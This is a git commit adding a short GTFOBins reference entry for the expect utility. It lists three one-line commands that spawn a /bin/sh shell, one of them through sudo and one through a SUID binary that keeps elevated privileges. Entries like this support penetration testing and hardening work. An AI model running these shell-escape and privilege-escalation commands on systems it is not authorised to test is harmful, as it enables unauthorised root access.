First commit
This commit is contained in:
9
_gtfobins/expect.md
Normal file
9
_gtfobins/expect.md
Normal file
@@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
---
|
||||
Reference in New Issue
Block a user